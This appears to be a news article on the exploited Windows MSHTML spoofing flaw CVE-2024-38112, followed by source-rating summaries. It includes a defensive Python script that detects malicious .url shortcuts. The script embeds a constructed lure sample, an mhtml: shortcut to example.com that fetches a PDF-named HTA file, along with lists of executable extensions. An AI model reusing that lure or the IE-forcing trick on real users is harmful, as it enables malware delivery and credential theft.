Microsoft's July 2024 Security Update: Patching the High-Severity CVE-2024-38112 Spoofing Vulnerability in Windows MSHTML Platform

Redmond, Washington United States of America
In July 2024, Microsoft released a patch for CVE-2024-38112, a high-severity spoofing vulnerability in the Windows MSHTML Platform.
Microsoft was notified of the vulnerability in May 2024 and shipped the fix in the July 2024 Patch Tuesday update on July 9, 2024.
The vulnerability let attackers trick users into opening malicious files or websites by disguising them as legitimate ones.
In July 2024, Microsoft released a series of security updates addressing multiple vulnerabilities across its products. Among them was CVE-2024-38112, a spoofing vulnerability in the Windows MSHTML Platform that had reportedly been exploited in the wild for over a year before it was discovered and patched. This article gives an overview of the vulnerability, its impact, and how it was exploited.

CVE-2024-38112 is a high-severity vulnerability with a CVSS score of 7.5 that allows attackers to trick users into opening malicious files or websites by disguising them as legitimate ones. It affects the Windows MSHTML Platform, the legacy rendering engine behind Internet Explorer, which other Microsoft applications such as Office can still embed to render HTML content.

The exploitation of CVE-2024-38112 relied on specially crafted Windows Internet Shortcut files (.url) whose target used the mhtml: URI scheme. Because that scheme was still registered to Internet Explorer, clicking the shortcut launched the retired browser and sent it to an attacker-controlled URL instead of opening the link in Edge or Chrome. Steering the victim into IE, with its weaker protections and far larger pool of known bugs, gave the attackers a significant advantage in exploiting the system.

Once IE loaded the attacker's page, it immediately offered a file for download and asked the user whether to open or save it. The shortcut carried a PDF-style icon and filename, so a user who chose to open what looked like a PDF actually launched an HTA (HTML Application) file, and the script inside it ran on the system with the user's privileges. In the samples Check Point analysed, the HTA installed the Atlantida password-stealing malware.

The exploitation was particularly concerning because Windows 10 and 11 are designed to keep users out of Internet Explorer: IE is retired and attempts to browse with it are redirected to Edge. The mhtml: handler sidestepped that redirection, so a .url file could still drive a fully updated system into IE. Anyone who had not disabled Internet Explorer entirely, or had not yet moved off it, remained exposed.
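The chain described above (a .url file whose mhtml: target drags the victim into IE, dressed up with a document icon and a PDF-looking name that really fetches an HTA) can be triaged from the shortcut file alone. The Python script below is an added example, not code from Check Point, Microsoft or the article. The indicator heuristics, the use of the MHTML `!x-usc:` part delimiter to recover the final navigation target, the stripping of padding characters before the extension check, and the two sample .url files (constructed, pointing at example.com) are all assumptions made for the example.

```python
"""Triage Windows Internet Shortcut (.url) files for the CVE-2024-38112 lure.

Added example (not Check Point's or Microsoft's code). Heuristics, stated
as assumptions about how the lure looks, derived from the article's description:
  1. URL= uses the mhtml: scheme, which before the July 2024 patch was
     registered to Internet Explorer and so forced the retired browser open;
  2. IconFile=/IconIndex= are set so the shortcut can masquerade as another
     file type (a PDF, say) in Explorer;
  3. the final navigation target is an HTML Application or other executable
     content whose name is dressed up with a document extension.
The .url samples are constructed for this example and point at example.com.
"""
import configparser
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)
# MHTML URLs have the form mhtml:<container>!x-usc:<part>; IE navigates to <part>.
USC_SPLIT = re.compile(r"!x-usc:", re.IGNORECASE)
EXEC_EXT = (".hta", ".exe", ".js", ".vbs", ".scr", ".cmd", ".bat", ".ps1")
DOC_HINT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\b", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    target: str
    indicators: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # The IE-forcing scheme alone is enough to quarantine the file.
        return "mhtml-scheme" in self.indicators


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys (lower-cased) of an INI-style .url file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text.replace("\r\n", "\n"))
    if not cp.has_section("InternetShortcut"):
        raise ValueError("no [InternetShortcut] section")
    return {k.lower(): v.strip() for k, v in cp.items("InternetShortcut")}


def final_target(url: str) -> str:
    """Resolve what IE will actually navigate to for a (possibly mhtml:) URL."""
    if MHTML_RE.match(url):
        parts = USC_SPLIT.split(MHTML_RE.sub("", url, count=1))
        return parts[-1].strip()
    return url.strip()


def analyse(path: str, text: str) -> Finding:
    fields = parse_url_file(text)
    url = fields.get("url", "")
    finding = Finding(path=path, target=final_target(url))

    if MHTML_RE.match(url):
        finding.indicators.append("mhtml-scheme")

    # A .url that borrows an icon from an .exe/.dll is dressing itself up as
    # something other than a web link (assumption: benign shortcuts rarely do this).
    if fields.get("iconfile", "").lower().endswith((".exe", ".dll")):
        finding.indicators.append("custom-icon")

    # Look at the file name IE will download; strip whitespace/control characters
    # first, since padding is a common way to push a real extension out of view
    # (an assumption about evasion, not something the article states).
    name = urlparse(finding.target).path.rsplit("/", 1)[-1]
    name = re.sub(r"[\s\x00-\x1f]", "", name).lower()
    if name.endswith(EXEC_EXT):
        finding.indicators.append("executable-target")
        if DOC_HINT.search(name):
            finding.indicators.append("double-extension")
    return finding


def scan(samples: dict) -> dict:
    """Analyse a {filename: file_contents} mapping; returns {filename: Finding}."""
    return {name: analyse(name, text) for name, text in samples.items()}


# Constructed samples for this example only.
SAMPLES = {
    "Books_report.pdf.url": "\r\n".join([
        "[InternetShortcut]",
        "URL=mhtml:http://example.com/docs/Books.pdf!x-usc:http://example.com/docs/Books.pdf.hta",
        "IconFile=C:\\Windows\\System32\\imageres.dll",
        "IconIndex=2",
        "",
    ]),
    "Intranet.url": "[InternetShortcut]\nURL=https://intranet.example.com/\n",
}

if __name__ == "__main__":
    for name, f in scan(SAMPLES).items():
        verdict = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{name}: {verdict} target={f.target} indicators={f.indicators}")
```

To run it over a quarantine folder, read each file with `open(path, encoding="utf-8-sig", errors="replace")` and pass the text to `analyse()`. The script treats the mhtml: scheme on its own as grounds to flag the file, since a web shortcut delivered by mail or download has little reason to use it; the icon and extension indicators are there to rank the hit and to explain it to an analyst, not to gate the verdict.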

Microsoft was notified of the vulnerability in May 2024 by Haifei Li of Check Point Research, who had found exploitation samples dating back to January 2023, with the most recent dated May 13, 2024. Microsoft fixed CVE-2024-38112 in the July 9, 2024 Patch Tuesday update by unregistering the mhtml: URI handler from Internet Explorer, so a .url file using that scheme now opens in Microsoft Edge rather than IE and the lure no longer works. CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog with a July 30, 2024 remediation deadline for federal civilian agencies.

Security patches should be applied as soon as they become available; for this vulnerability, that means installing the July 2024 cumulative update without delay. Beyond patching, treat .url files received by email or download with suspicion, be cautious with files and links from untrusted sources, and do not click through open/save prompts or Mark of the Web warnings without checking what is actually about to run.

In summary, CVE-2024-38112 is a high-severity vulnerability that was exploited in the wild for over a year before it was discovered and patched. It allowed attackers to trick users into opening malicious files or websites by disguising them as legitimate ones, routing the victim through the retired Internet Explorer and giving the attackers a significant advantage in exploiting the system. Microsoft released the fix on July 9, 2024, and users should apply it as soon as possible.



Confidence

100%

No Doubts Found At Time Of Publication

Sources

97%

  • Unique Points
    • Microsoft fixed a Windows zero-day vulnerability, tracked as CVE-2024-38112, which had been actively exploited in attacks for eighteen months.
    • Haifei Li of Check Point Research discovered the vulnerability and reported it to Microsoft in May 2024, after finding samples exploiting it as far back as January 2023.
    • Threat actors have been distributing Windows Internet Shortcut Files (.url) to spoof legitimate-looking files like PDFs, but they actually download and launch HTA files to install password-stealing malware.
    • Internet Explorer is still included by default on Windows 10 and Windows 11, despite Microsoft announcing its retirement. It can be invoked and leveraged for malicious purposes.
    • Threat actors create .url files with icon indexes to make them appear as links to PDFs. When clicked, the specified web page opens in Internet Explorer, which automatically attempts to download a file that appears to be a PDF but is actually an HTA file.
    • When Internet Explorer downloads the HTA file, it asks if you wish to save or open it. If a user decides to open it, thinking it’s a PDF, and does not see the Mark of the Web alert, the file is allowed to run and installs Atlantida Stealer malware.
    • Microsoft has fixed CVE-2024-38112 by unregistering the mhtml: URI from Internet Explorer, so it now opens in Microsoft Edge instead.
  • Accuracy
    No Contradictions at Time Of Publication
  • Deception (100%)
    None Found At Time Of Publication
  • Fallacies (85%)
    The article contains a few informal fallacies and an example of inflammatory rhetoric. It also uses dichotomous depiction by presenting Internet Explorer as still being included by default in Windows 10 and Windows 11 despite Microsoft's announcement of its retirement, thus implying that it is still widely used for malicious purposes.
    • The flaw, tracked as CVE-2024-38112, is a high-severity MHTML spoofing issue fixed during the July 2024 Patch Tuesday security updates.
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

98%

  • Unique Points
    • CVE-2024-38080 is a Windows Hyper-V Elevation of Privilege Vulnerability with Important severity and CVSS score 7.8.
    • CVE-2024-38112 is a Windows MSHTML Platform Spoofing Vulnerability with Important severity and CVSS score 7.5.
    • CVE-2024-37985 is a "Systematic Identification and Characterization of Proprietary Prefetchers" vulnerability affecting Arm-based Windows systems with Important severity and no public exploitation.
    • CVE-2024-35264 is a .NET and Visual Studio Remote Code Execution Vulnerability with Important severity and CVSS score 8.1.
    • CVE-2024-38095 is a .NET and Visual Studio Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-30105 is a .NET Core and Visual Studio Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38101, CVE-2024-38102, and CVE-2024-38105 are all Windows Layer-2 Bridge Network Driver Denial of Service Vulnerabilities with Important severity and no public exploitation.
    • CVE-2024-38074, CVE-2024-38076, and CVE-2024-38077 are all Windows Remote Desktop Licensing Service Remote Code Execution Vulnerabilities with Critical severity and no public exploitation.
    • CVE-2024-38115 is a Microsoft Office Word Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38096 is a Microsoft Windows DNS Server Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38117 is a Microsoft Office Excel Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38119 is a Microsoft Windows Remote Procedure Call (RPC) Endpoint Mapper Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38116 is a Microsoft Office PowerPoint Denial of Service Vulnerability with Important severity and no public exploitation.
    • CVE-2024-38118 is a Microsoft Windows Remote Desktop Protocol (RDP) Client Denial of Service Vulnerability with Important severity and no public exploitation.
  • Accuracy
    • Microsoft fixed a Windows zero-day vulnerability, tracked as CVE-2024-38112, which had been actively exploited in attacks for eighteen months.
    • The flaw is a high-severity MHTML spoofing issue that allows malicious scripts to bypass built-in security features.
  • Deception (100%)
    None Found At Time Of Publication
  • Fallacies (100%)
    None Found At Time Of Publication
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

95%

  • Unique Points
    • Threat actors exploited a Windows 0-day vulnerability for over a year before Microsoft fixed it.
    • Malicious code disguised as PDF files tricked users into opening Internet Explorer and executing malicious code.
  • Accuracy
    • The vulnerability caused devices to open Internet Explorer, a legacy browser that Microsoft had decommissioned.
  • Deception (100%)
    None Found At Time Of Publication
  • Fallacies (85%)
    The article contains an appeal to authority and inflammatory rhetoric. It also uses a dichotomous depiction of Microsoft's actions.
    • The vulnerability, which resided in the MSHTML engine of Windows, carried a severity rating of 7.0 out of 10.
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

94%

  • Unique Points
    • Microsoft Windows users are at risk from a previously unknown trick to attack their PCs.
    • The threat is now being actively exploited through a hidden vulnerability on your system, one that has just been patched by Microsoft.
    • Check Point warns that attackers are using special Windows Internet Shortcut files, which, when clicked, call the retired Internet Explorer (IE) to visit the attacker-controlled URL.
    • The vulnerability CVE-2024-38112 isn’t the only Microsoft Windows patch to make CISA’s list with a July 30 deadline. The government has also added CVE-2024-38080.
    • Updating Windows now will address both vulnerabilities, as well as a further 137 patches in Microsoft’s bulging July update.
  • Accuracy
    • The US government has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and mandated that all Windows systems in use by federal employees be updated or shut down within 21 days, by July 30.
    • CISA, the government’s cybersecurity agency, advises that threat actors have been using attacking techniques for quite some time.
    • Microsoft acknowledged this vulnerability had been exploited in its update and has published Check Point’s report on the issue.
  • Deception (80%)
    The article by Zak Doffman contains several instances of sensationalism and selective reporting. The title itself is misleading as it implies that all Windows users are at imminent risk and must update within 21 days or face consequences. However, the article later states that the vulnerability has been exploited for over a year, implying that many users may already be affected. This contradicts the urgency conveyed in the title. Additionally, while the article mentions two specific vulnerabilities and their deadlines for patching, it only focuses on CVE-2024-38112 and its exploitation through Internet Explorer. The second vulnerability, CVE-2024-38080, is mentioned in passing but not explored further. This selective reporting creates a false sense of urgency around one vulnerability while downplaying the importance of addressing the other. Furthermore, the article quotes Check Point warning about attackers exploiting these vulnerabilities and Microsoft acknowledging their existence, but it does not provide any evidence or citations to support these claims.
    • Microsoft Windows users are suddenly at risk from a ‘previously unknown’ trick to attack their PCs.
    • Serious new Window warning
    • CISA, the government’s cybersecurity agency has mandated all Windows systems in use by federal employees be updated or shut down within 21-days, by July 30.
    • Microsoft acknowledged this vulnerability had been exploited in its update
  • Fallacies (100%)
    None Found At Time Of Publication
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication

88%

  • Unique Points
    • Microsoft released a patch for the spoofing vulnerability CVE-2024-38112 on Tuesday.
    • The vulnerability, which affects Windows MSHTML Platform, has likely been exploited by attackers in the wild for over a year.
    • Attackers used special Windows Internet Shortcut files (.url extension) to lure users into opening an attacker-controlled URL and gain significant advantages in exploiting the victim’s computer.
    • The vulnerability allows an attacker to trick the user into opening a malicious HTA (HTML application) file, which executes and enables remote code execution.
  • Accuracy
    No Contradictions at Time Of Publication
  • Deception (50%)
    The article contains selective reporting as the author only mentions two specific vulnerabilities (CVE-2024-38112 and CVE-2024-38021) out of possibly many that Microsoft has patched recently. The author also implies that these vulnerabilities are more significant than others by dedicating a large portion of the article to them, without providing any context or evidence to support this claim.
    • The author only mentions CVE-2024-38112 and CVE-2024-38021 out of possibly many vulnerabilities that Microsoft has patched recently.
    • The author dedicates a large portion of the article to these two vulnerabilities, implying that they are more significant than others without providing any context or evidence.
  • Fallacies (90%)
    No direct fallacies found in the author's statements. However, there are some potential issues with inflammatory rhetoric and appeals to authority. The article mentions that attackers have been exploiting a vulnerability for over a year but does not specify who discovered this or provide evidence beyond the claim of one researcher. Additionally, there is an appeal to authority in mentioning CISA's directive to agencies to apply the patch by a certain date. The inflammatory rhetoric comes from phrases like 'attackers have been using novel tricks' and 'gaining significant advantages', which are intended to evoke strong emotions but do not add substantive information.
    • CVE-2024-38112, a spoofing vulnerability in Windows MSHTML Platform for which Microsoft has released a fix on Tuesday, has likely been exploited by attackers in the wild for over a year, Check Point researcher Haifei Li has revealed.
    • Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users for remote code execution. Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL.
    • For example, if the attacker has an IE zero-day exploit – which is much easier to find compared to Chrome/Edge, the attacker could attack the victim to gain remote code execution immediately.
    • However, in the samples we analyzed, the threat actors didn't use any IE remote code execution exploit. Instead, they used another trick in IE – which is probably not publicly known previously – to the best of our knowledge – to trick the victim into gaining remote code execution.
    • The malicious .url samples we discovered could be dated back as early as January 2023 (more than one year ago) to the latest May 13, 2024 (…). This suggests that threat actors have been using the attacking techniques for quite some time.
    • CISA has added CVE-2024-38112 to its Known Exploited Vulnerabilities (KEV) catalog, thus ordering US federal civilian executive branch agencies to apply the patch by July 30.
  • Bias (100%)
    None Found At Time Of Publication
  • Site Conflicts Of Interest (100%)
    None Found At Time Of Publication
  • Author Conflicts Of Interest (100%)
    None Found At Time Of Publication